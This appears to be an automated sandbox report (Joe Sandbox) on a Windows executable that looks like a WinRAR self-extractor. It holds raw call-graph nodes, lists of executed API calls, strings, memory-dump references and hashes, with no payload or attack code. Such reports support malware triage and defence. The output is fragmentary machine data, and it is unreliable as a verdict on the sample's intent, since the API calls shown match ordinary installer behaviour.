27 API calls CatchGuardHandler 25374 cc1025 29 API calls 25419 cdc220 93 API calls _swprintf 25376 cef421 21 API calls __vsnwprintf_l 25404 cdf530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25442 cdff30 LocalFree 24728 cebb30 24729 cebb39 24728->24729 24731 cebb42 24728->24731 24732 ceba27 24729->24732 24733 ce97e5 _unexpected 38 API calls 24732->24733 24734 ceba34 24733->24734 24752 cebb4e 24734->24752 24736 ceba3c 24761 ceb7bb 24736->24761 24739 ceba53 24739->24731 24740 ce8e06 __vsnwprintf_l 21 API calls 24741 ceba64 24740->24741 24742 ceba96 24741->24742 24768 cebbf0 24741->24768 24744 ce8dcc _free 20 API calls 24742->24744 24744->24739 24746 ceba91 24778 ce91a8 20 API calls __dosmaperr 24746->24778 24748 cebada 24748->24742 24779 ceb691 26 API calls 24748->24779 24749 cebaae 24749->24748 24750 ce8dcc _free 20 API calls 24749->24750 24750->24748 24753 cebb5a ___scrt_is_nonwritable_in_current_image 24752->24753 24754 ce97e5 _unexpected 38 API calls 24753->24754 24759 cebb64 24754->24759 24756 cebbe8 _abort 24756->24736 24759->24756 24760 ce8dcc _free 20 API calls 24759->24760 24780 ce8d24 38 API calls _abort 24759->24780 24781 ceac31 EnterCriticalSection 24759->24781 24782 cebbdf LeaveCriticalSection _abort 24759->24782 24760->24759 24762 ce4636 __cftof 38 API calls 24761->24762 24763 ceb7cd 24762->24763 24764 ceb7ee 24763->24764 24765 ceb7dc GetOEMCP 24763->24765 24766 ceb805 24764->24766 24767 ceb7f3 GetACP 24764->24767 24765->24766 24766->24739 24766->24740 24767->24766 24769 ceb7bb 40 API calls 24768->24769 24770 cebc0f 24769->24770 24773 cebc60 IsValidCodePage 24770->24773 24775 cebc16 24770->24775 24777 cebc85 __cftof 24770->24777 24771 cdfbbc CatchGuardHandler 5 API calls 24772 ceba89 24771->24772 24772->24746 24772->24749 24774 cebc72 GetCPInfo 24773->24774 24773->24775 24774->24775 24774->24777 24775->24771 24783 ceb893 GetCPInfo 24777->24783 24778->24742 24779->24742 24781->24759 24782->24759 24788 ceb8cd 24783->24788 24792 ceb977 24783->24792 24785 cdfbbc CatchGuardHandler 5 API calls 24787 ceba23 24785->24787 24787->24775 24793 cec988 24788->24793 24791 ceab78 __vsnwprintf_l 43 API calls 24791->24792 24792->24785 24794 ce4636 __cftof 38 API calls 24793->24794 24795 cec9a8 MultiByteToWideChar 24794->24795 24797 ceca7e 24795->24797 24798 cec9e6 24795->24798 24799 cdfbbc CatchGuardHandler 5 API calls 24797->24799 24800 ce8e06 __vsnwprintf_l 21 API calls 24798->24800 24803 ceca07 __cftof __vsnwprintf_l 24798->24803 24801 ceb92e 24799->24801 24800->24803 24807 ceab78 24801->24807 24802 ceca78 24812 ceabc3 20 API calls _free 24802->24812 24803->24802 24805 ceca4c MultiByteToWideChar 24803->24805 24805->24802 24806 ceca68 GetStringTypeW 24805->24806 24806->24802 24808 ce4636 __cftof 38 API calls 24807->24808 24809 ceab8b 24808->24809 24813 cea95b 24809->24813 24812->24797 24814 cea976 __vsnwprintf_l 24813->24814 24815 cea99c MultiByteToWideChar 24814->24815 24816 cea9c6 24815->24816 24817 ceab50 24815->24817 24820 ce8e06 __vsnwprintf_l 21 API calls 24816->24820 24823 cea9e7 __vsnwprintf_l 24816->24823 24818 cdfbbc CatchGuardHandler 5 API calls 24817->24818 24819 ceab63 24818->24819 24819->24791 24820->24823 24821 ceaa9c 24849 ceabc3 20 API calls _free 24821->24849 24822 ceaa30 MultiByteToWideChar 24822->24821 24824 ceaa49 24822->24824 24823->24821 24823->24822 24840 ceaf6c 24824->24840 24828 ceaaab 24832 ce8e06 __vsnwprintf_l 21 API calls 24828->24832 24835 ceaacc __vsnwprintf_l 24828->24835 24829 ceaa73 24829->24821 24830 ceaf6c __vsnwprintf_l 11 API calls 24829->24830 24830->24821 24831 ceab41 24848 ceabc3 20 API calls _free 24831->24848 24832->24835 24833 ceaf6c __vsnwprintf_l 11 API calls 24836 ceab20 24833->24836 24835->24831 24835->24833 24836->24831 24837 ceab2f WideCharToMultiByte 24836->24837 24837->24831 24838 ceab6f 24837->24838 24850 ceabc3 20 API calls _free 24838->24850 24841 ceac98 __dosmaperr 5 API calls 24840->24841 24842 ceaf93 24841->24842 24843 ceaf9c 24842->24843 24851 ceaff4 10 API calls 3 library calls 24842->24851 24846 cdfbbc CatchGuardHandler 5 API calls 24843->24846 24845 ceafdc LCMapStringW 24845->24843 24847 ceaa60 24846->24847 24847->24821 24847->24828 24847->24829 24848->24821 24849->24817 24850->24821 24851->24845 25378 cec030 GetProcessHeap

                                                            Executed Functions

                                                            Function 00CDDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00CD0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00CD087C
                                                              • Part of subcall function 00CD0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CD088E
                                                              • Part of subcall function 00CD0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CD08BF
                                                              • Part of subcall function 00CDA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00CDA655
                                                              • Part of subcall function 00CDAC16: OleInitialize.OLE32(00000000), ref: 00CDAC2F
                                                              • Part of subcall function 00CDAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CDAC66
                                                              • Part of subcall function 00CDAC16: SHGetMalloc.SHELL32(00D08438), ref: 00CDAC70
                                                            • GetCommandLineW.KERNEL32 ref: 00CDDF5C
                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00CDDF83
                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00CDDF94
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 00CDDFCE
                                                              • Part of subcall function 00CDDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CDDBF4
                                                              • Part of subcall function 00CDDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CDDC30
                                                            • CloseHandle.KERNEL32(00000000), ref: 00CDDFD7
                                                            • GetModuleFileNameW.KERNEL32(00000000,00D1EC90,00000800), ref: 00CDDFF2
                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,00D1EC90), ref: 00CDDFFE
                                                            • GetLocalTime.KERNEL32(?), ref: 00CDE009
                                                            • _swprintf.LIBCMT ref: 00CDE048
                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00CDE05A
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00CDE061
                                                            • LoadIconW.USER32(00000000,00000064), ref: 00CDE078
                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00CDE0C9
                                                            • Sleep.KERNEL32(?), ref: 00CDE0F7
                                                            • DeleteObject.GDI32 ref: 00CDE130
                                                            • DeleteObject.GDI32(?), ref: 00CDE140
                                                            • CloseHandle.KERNEL32 ref: 00CDE183
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                            • API String ID: 3049964643-3743209390
                                                            • Opcode ID: 7e028a9a323587d8fa3e6ec615caf6676ef0974dca994f9c39e27f35438fdd45
                                                            • Instruction ID: ad3e4e2afdb8e70426ef12c3275aaf09c854915aef461ab4cb38d36035651922
                                                            • Opcode Fuzzy Hash: 7e028a9a323587d8fa3e6ec615caf6676ef0974dca994f9c39e27f35438fdd45
                                                            • Instruction Fuzzy Hash: E961D271A04345BBD320ABA4EC49F7F77A9AB45700F00442BFA4AD23A1DF749944D772
                                                            Function 00CDA6C2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 812 cda6c2-cda6df FindResourceW 813 cda7db 812->813 814 cda6e5-cda6f6 SizeofResource 812->814 815 cda7dd-cda7e1 813->815 814->813 816 cda6fc-cda70b LoadResource 814->816 816->813 817 cda711-cda71c LockResource 816->817 817->813 818 cda722-cda737 GlobalAlloc 817->818 819 cda73d-cda746 GlobalLock 818->819 820 cda7d3-cda7d9 818->820 821 cda7cc-cda7cd GlobalFree 819->821 822 cda74c-cda76a call ce0320 819->822 820->815 821->820 826 cda76c-cda78e call cda626 822->826 827 cda7c5-cda7c6 GlobalUnlock 822->827 826->827 832 cda790-cda798 826->832 827->821 833 cda79a-cda7ae GdipCreateHBITMAPFromBitmap 832->833 834 cda7b3-cda7c1 832->834 833->834 835 cda7b0 833->835 834->827 835->834
                                                            APIs
                                                            • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6D5
                                                            • SizeofResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA6EC
                                                            • LoadResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA703
                                                            • LockResource.KERNEL32(00000000,?,?,?,00CDB73D,00000066), ref: 00CDA712
                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CDB73D,00000066), ref: 00CDA72D
                                                            • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00CDB73D,00000066), ref: 00CDA73E
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00CDA7C6
                                                              • Part of subcall function 00CDA626: GdipAlloc.GDIPLUS(00000010), ref: 00CDA62C
                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CDA7A7
                                                            • GlobalFree.KERNEL32(00000000), ref: 00CDA7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                            • String ID: PNG
                                                            • API String ID: 541704414-364855578
                                                            • Opcode ID: adc3c27d25da5ae141a146d576b775628e02a41f5722261a57d06cbd420e2505
                                                            • Instruction ID: b1630b1cecd9fe471fb7be987c7451b9123abae896e4612ee5534265ed431519
                                                            • Opcode Fuzzy Hash: adc3c27d25da5ae141a146d576b775628e02a41f5722261a57d06cbd420e2505
                                                            • Instruction Fuzzy Hash: 5E319175600342BFD7109F21EC88E2F7BB9EF84761B15451AFA15C2321EB31DD44DAA2
                                                            Function 00CCA69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1030 cca69b-cca6bf call cdec50 1033 cca727-cca730 FindNextFileW 1030->1033 1034 cca6c1-cca6ce FindFirstFileW 1030->1034 1035 cca742-cca7ff call cd0602 call ccc310 call cd15da * 3 1033->1035 1036 cca732-cca740 GetLastError 1033->1036 1034->1035 1037 cca6d0-cca6e2 call ccbb03 1034->1037 1041 cca804-cca811 1035->1041 1038 cca719-cca722 1036->1038 1045 cca6fe-cca707 GetLastError 1037->1045 1046 cca6e4-cca6fc FindFirstFileW 1037->1046 1038->1041 1048 cca709-cca70c 1045->1048 1049 cca717 1045->1049 1046->1035 1046->1045 1048->1049 1050 cca70e-cca711 1048->1050 1049->1038 1050->1049 1052 cca713-cca715 1050->1052 1052->1038
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6C4
                                                              • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6F2
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6FE
                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA728
                                                            • GetLastError.KERNEL32(?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA734
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                            • String ID:
                                                            • API String ID: 42610566-0
                                                            • Opcode ID: dc4b0683fa7bc1563b306c47cd28cbc6507c119b2241fc829546be79d818e682
                                                            • Instruction ID: 0bd3d2119a5de08dabd0e148464633c5fee509b36daac70e3f78f8961415629b
                                                            • Opcode Fuzzy Hash: dc4b0683fa7bc1563b306c47cd28cbc6507c119b2241fc829546be79d818e682
                                                            • Instruction Fuzzy Hash: 8F418072500559ABCB25DF64CC88BE9B7B8FB48350F14419AE96DD3200D734AE90DF91
                                                            Function 00CE7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,00CE7DC4,00000000,00CFC300,0000000C,00CE7F1B,00000000,00000002,00000000), ref: 00CE7E0F
                                                            • TerminateProcess.KERNEL32(00000000,?,00CE7DC4,00000000,00CFC300,0000000C,00CE7F1B,00000000,00000002,00000000), ref: 00CE7E16
                                                            • ExitProcess.KERNEL32 ref: 00CE7E28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 873838a1e9dcb8ec512ab8134f66a8d386ebec8e86899bbd1ed0eb732709036a
                                                            • Instruction ID: fd21ebdc42877ba7ef0112347b27df6dbfab407cbd84f431e280ab2befcbbcdd
                                                            • Opcode Fuzzy Hash: 873838a1e9dcb8ec512ab8134f66a8d386ebec8e86899bbd1ed0eb732709036a
                                                            • Instruction Fuzzy Hash: 03E09A31004294BFCB116F55DD0AB5A7F69AB50341B004555F8158B132CB35EE51DB91
                                                            Function 00CC848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 01559e70a9b012ed2665eec784eac0698f5ff233111a9a8faf3299cfc2fd602c
                                                            • Instruction ID: 7c96fdd495a8cfb93c4b101d06abf84f789af1523dcd4e85a4bd20ff232e61cc
                                                            • Opcode Fuzzy Hash: 01559e70a9b012ed2665eec784eac0698f5ff233111a9a8faf3299cfc2fd602c
                                                            • Instruction Fuzzy Hash: 9482F870904245AEDF15DB64C895FFBBBB9AF05300F0841BEE8599B282DB705B8DDB60
                                                            Function 00CDB7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CDB7E5
                                                              • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                              • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDB8D1
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB8EF
                                                            • IsDialogMessageW.USER32(?,?), ref: 00CDB902
                                                            • TranslateMessage.USER32(?), ref: 00CDB910
                                                            • DispatchMessageW.USER32(?), ref: 00CDB91A
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00CDB93D
                                                            • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00CDB960
                                                            • GetDlgItem.USER32(?,00000068), ref: 00CDB983
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CDB99E
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00CF35F4), ref: 00CDB9B1
                                                              • Part of subcall function 00CDD453: _wcslen.LIBCMT ref: 00CDD47D
                                                            • SetFocus.USER32(00000000), ref: 00CDB9B8
                                                            • _swprintf.LIBCMT ref: 00CDBA24
                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                              • Part of subcall function 00CDD4D4: GetDlgItem.USER32(00000068,00D1FCB8), ref: 00CDD4E8
                                                              • Part of subcall function 00CDD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00CDAF07,00000001,?,?,00CDB7B9,00CF506C,00D1FCB8,00D1FCB8,00001000,00000000,00000000), ref: 00CDD510
                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CDD51B
                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CF35F4), ref: 00CDD529
                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD53F
                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CDD559
                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD59D
                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CDD5AB
                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD5BA
                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD5E1
                                                              • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CF43F4), ref: 00CDD5F0
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CDBA68
                                                            • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00CDBA90
                                                            • GetTickCount.KERNEL32 ref: 00CDBAAE
                                                            • _swprintf.LIBCMT ref: 00CDBAC2
                                                            • GetLastError.KERNEL32(?,00000011), ref: 00CDBAF4
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00CDBB43
                                                            • _swprintf.LIBCMT ref: 00CDBB7C
                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00CDBBD0
                                                            • GetCommandLineW.KERNEL32 ref: 00CDBBEA
                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00CDBC47
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00CDBC6F
                                                            • Sleep.KERNEL32(00000064), ref: 00CDBCB9
                                                            • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00CDBCE2
                                                            • CloseHandle.KERNEL32(00000000), ref: 00CDBCEB
                                                            • _swprintf.LIBCMT ref: 00CDBD1E
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDBD7D
                                                            • SetDlgItemTextW.USER32(?,00000065,00CF35F4), ref: 00CDBD94
                                                            • GetDlgItem.USER32(?,00000065), ref: 00CDBD9D
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00CDBDAC
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CDBDBB
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDBE68
                                                            • _wcslen.LIBCMT ref: 00CDBEBE
                                                            • _swprintf.LIBCMT ref: 00CDBEE8
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CDBF32
                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00CDBF4C
                                                            • GetDlgItem.USER32(?,00000068), ref: 00CDBF55
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00CDBF6B
                                                            • GetDlgItem.USER32(?,00000066), ref: 00CDBF85
                                                            • SetWindowTextW.USER32(00000000,00D0A472), ref: 00CDBFA7
                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00CDC007
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDC01A
                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00CDC0BD
                                                            • EnableWindow.USER32(00000000,00000000), ref: 00CDC197
                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00CDC1D9
                                                              • Part of subcall function 00CDC73F: __EH_prolog.LIBCMT ref: 00CDC744
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDC1FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                            • API String ID: 3445078344-2238251102
                                                            • Opcode ID: ed0ecb5a5d0a6588793da6d0269fd358d0d8ce1065af8473500451ad807c1ca6
                                                            • Instruction ID: b02bda95bf7c78da842c67a684774b6dcab831cf87a6c31d76e57226e2214bea
                                                            • Opcode Fuzzy Hash: ed0ecb5a5d0a6588793da6d0269fd358d0d8ce1065af8473500451ad807c1ca6
                                                            • Instruction Fuzzy Hash: DE42F470944349BAEB21AB60DC8AFBE776CAB11700F00405AF758E63D2CB749E45EB71
                                                            Function 00CD0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 268 cd0863-cd0886 call cdec50 GetModuleHandleW 271 cd0888-cd089f GetProcAddress 268->271 272 cd08e7-cd0b48 268->272 273 cd08b9-cd08c9 GetProcAddress 271->273 274 cd08a1-cd08b7 271->274 275 cd0b4e-cd0b59 call ce75fb 272->275 276 cd0c14-cd0c40 GetModuleFileNameW call ccc29a call cd0602 272->276 277 cd08cb-cd08e0 273->277 278 cd08e5 273->278 274->273 275->276 286 cd0b5f-cd0b8d GetModuleFileNameW CreateFileW 275->286 292 cd0c42-cd0c4e call ccb146 276->292 277->278 278->272 287 cd0b8f-cd0b9b SetFilePointer 286->287 288 cd0c08-cd0c0f CloseHandle 286->288 287->288 290 cd0b9d-cd0bb9 ReadFile 287->290 288->276 290->288 294 cd0bbb-cd0be0 290->294 297 cd0c7d-cd0ca4 call ccc310 GetFileAttributesW 292->297 298 cd0c50-cd0c5b call cd081b 292->298 296 cd0bfd-cd0c06 call cd0371 294->296 296->288 305 cd0be2-cd0bfc call cd081b 296->305 308 cd0cae 297->308 309 cd0ca6-cd0caa 297->309 298->297 307 cd0c5d-cd0c7b CompareStringW 298->307 305->296 307->297 307->309 312 cd0cb0-cd0cb5 308->312 309->292 311 cd0cac 309->311 311->312 313 cd0cec-cd0cee 312->313 314 cd0cb7 312->314 315 cd0dfb-cd0e05 313->315 316 cd0cf4-cd0d0b call ccc2e4 call ccb146 313->316 317 cd0cb9-cd0ce0 call ccc310 GetFileAttributesW 314->317 327 cd0d0d-cd0d6e call cd081b * 2 call cce617 call cc4092 call cce617 call cda7e4 316->327 328 cd0d73-cd0da6 call cc4092 AllocConsole 316->328 322 cd0cea 317->322 323 cd0ce2-cd0ce6 317->323 322->313 323->317 325 cd0ce8 323->325 325->313 334 cd0df3-cd0df5 ExitProcess 327->334 333 cd0da8-cd0ded GetCurrentProcessId AttachConsole call ce3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
